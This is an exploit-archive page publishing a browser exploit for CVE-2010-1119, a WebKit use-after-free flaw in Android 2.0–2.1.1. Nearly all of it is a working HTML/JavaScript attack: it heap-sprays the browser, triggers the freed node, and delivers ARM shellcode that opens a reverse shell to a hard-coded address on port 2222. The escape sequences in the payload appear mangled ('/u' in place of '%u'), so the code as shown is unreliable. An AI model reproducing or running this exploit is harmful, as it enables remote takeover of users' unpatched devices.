[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit
# Published : 2011-03-14
# Author : MJ Keith
# Previous Title : checkview v1.1 for iPhone / iPod Touch Directory Traversal
# Next Title : Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow


			
<html><!-- # Exploit Title: android exploit for 2010-1119 use after free# Date: 2011/03/11# Author: MJ Keith# Software Link: http://www.android.com/# Version: 2.0 ,2.1 , 2.1.1# Tested on: Android# CVE : 2010-1119This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsidesemail: mkeith AT exploitscience.org--><head><script language="JavaScript">function heap(){var id = document.getElementById("target");var attribute = id.getAttributeNode('id');nodes = attribute.childNodes;document.body.removeChild(id);attribute.removeChild(nodes[0]);setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("/u0058/u0058")); };var scode = unescape("/u0060/u0060");var scode2 = unescape("/u5005/ue1a0");var shell = unescape("/u0002/ue3a0/u1001/ue3a0/u2005/ue281/u708c/ue3a0/u708d/ue287/u0080/uef00/u6000/ue1a0/u1084/ue28f/u2010/ue3a0/u708d/ue3a0//u708e/ue287/u0080/uef00/u0006/ue1a0/u1000/ue3a0/u703f/ue3a0/u0080/uef00/u0006/ue1a0/u1001/ue3a0/u703f/ue3a0/u0080/uef00/u0006/ue1a0/u1002/ue3a0/u703f/ue3a0/u0080/uef00/u2001/ue28f/uff12/ue12f/u4040/u2717/udf80/ua005/ua508/u4076/u602e/u1b6d/ub420/ub401/u4669/u4052/u270b/udf80/u2f2f/u732f/u7379/u6574/u2f6d/u6962/u2f6e/u6873/u2000/u2000/u2000/u2000/u2000/u2000/u2000/u2000/u2000/u2000/u0002");shell += unescape("/uae08"); // Port = 2222shell += unescape("/u000a/u0202"); // IP = 10.0.2.2shell += unescape("/u2000/u2000"); // string terminate do {  scode += scode;  scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell         target = new Array();        for(i = 0; i < 300; i++){                      if (i<130){ target[i] = scode;}            if (i>130){ target[i] = scode2;}                  document.write(target[i]);                  document.write("<br />");                if (i>250){                       //  alert("freeze");                         nodes[0].textContent}} }, 0);}</script></head><body onload=heap()><p id=target></p></body></html>